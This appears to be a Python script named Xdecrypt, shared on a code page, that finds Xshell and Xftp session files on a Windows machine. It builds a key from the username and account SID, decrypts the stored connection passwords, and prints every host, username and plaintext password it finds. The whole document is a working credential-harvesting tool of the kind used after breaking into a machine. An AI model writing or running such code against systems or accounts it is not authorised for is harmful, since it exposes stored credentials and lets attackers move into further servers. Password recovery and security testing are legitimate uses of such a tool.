Xdecrypt
Xdecrypt copied to clipboard
cannot be used independently from the original environment
import os import sys import argparse import base64 import configparser
from win32api import GetComputerName, GetUserName from win32security import LookupAccountName, ConvertSidToStringSid from Crypto.Hash import SHA256 from Crypto.Cipher import ARC4
def decrypt_string(a1, a2): v1 = base64.b64decode(a2) v3 = ARC4.new(SHA256.new(a1.encode('ascii')).digest()).decrypt(v1[:len(v1) - 0x20]) if SHA256.new(v3).digest() == v1[-32:]: return v3.decode('ascii') else: return None
VERSION_6_CONFIG_PATH = os.path.join(os.environ["USERPROFILE"], r"Documents\NetSarang Computer\6") VERSION_7_CONFIG_PATH = os.path.join(os.environ["USERPROFILE"], r"Documents\NetSarang Computer\7")
config_path = ""
parser = argparse.ArgumentParser(description="xsh, xfp password decrypt")
parser.add_argument("-v", "--version", default="7", help="Xshell version, eg. 6 or 7")
parser.add_argument("-s", "--sid", default="", type=str, help="sid, get by whoami /user
in command.")
parser.add_argument("-u", "--user", default="", type=str, help="username, get by whoami /user
in command.")
parser.add_argument("-p", "--password", default="", type=str, help="the password in sessions or path of sessions")
args = parser.parse_args()
if not args.password: if os.path.exists(VERSION_6_CONFIG_PATH): config_path = VERSION_6_CONFIG_PATH elif os.path.exists(VERSION_7_CONFIG_PATH): config_path = VERSION_7_CONFIG_PATH else: print("Error: can't found valid session path") sys.exit(0) args.password = config_path
if not args.sid: # method from https://github.com/JDArmy/SharpXDecrypt if config_path == VERSION_7_CONFIG_PATH: tmp = GetUserName()[::-1] + ConvertSidToStringSid(LookupAccountName(GetComputerName(), GetUserName())[0]) args.token = tmp[::-1] else: args.token = GetUserName() + ConvertSidToStringSid(LookupAccountName(GetComputerName(), GetUserName())[0]) else: if args.version == '7': args.token = (args.user[::-1] + args.sid)[::-1] else: args.token = args.user + args.sid
if not os.path.isdir(args.password): r = decrypt_string(args.token, args.password) if r: print(r)
for root, dirs, files in os.walk(args.password): for f in files: if f.endswith(".xsh") or f.endswith(".xfp"): filepath = os.path.join(root, f) cfg = configparser.ConfigParser() try: cfg.read(filepath) except UnicodeDecodeError: cfg.read(filepath, encoding="utf-16")
try:
if f.endswith(".xsh"):
host = "{}:{}".format(cfg["CONNECTION"]["Host"], cfg["CONNECTION"]["Port"])
username = cfg["CONNECTION:AUTHENTICATION"]["UserName"]
password = decrypt_string(args.token, cfg["CONNECTION:AUTHENTICATION"]["Password"])
else:
host = "{}:{}".format(cfg["Connection"]["Host"], cfg["Connection"]["Port"])
username = cfg["Connection"]["UserName"]
password = decrypt_string(args.token, cfg["Connection"]["Password"])
print(
f"{filepath:=^100}\nHost: {host}\nUsername: {username}\nPassword: {password}")
except Exception as e:
print(f"{filepath:=^100}\nError:{e}")